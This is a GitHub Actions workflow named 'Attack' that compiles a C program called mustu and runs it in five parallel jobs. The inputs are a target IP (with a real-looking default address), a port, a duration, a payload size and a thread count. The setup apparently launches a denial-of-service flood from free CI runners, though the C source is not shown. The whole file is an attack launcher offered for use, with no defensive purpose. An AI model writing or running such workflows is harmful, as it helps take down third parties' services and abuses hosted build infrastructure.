name: Attack

on:
  workflow_dispatch:
    inputs:
      ip:
        description: 'Target IP'
        required: true
        default: '91.108.17.10'
      port:
        description: 'Target Port'
        required: true
        default: '32001'
      time:
        description: 'Duration (seconds)'
        required: true
        default: '60'
      size:
        description: 'Payload Size (bytes)'
        required: true
        default: '1024'
      threads:
        description: 'Threads per Job'
        required: true
        default: '10'

jobs:
  attack:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job: [1, 2, 3, 4, 5]
    steps:
    - uses: actions/checkout@v4
    - run: gcc -o mustu mustu.c -lpthread
    - run: ./mustu ${{ github.event.inputs.ip }} ${{ github.event.inputs.port }} ${{ github.event.inputs.time }} ${{ github.event.inputs.size }} ${{ github.event.inputs.threads }}
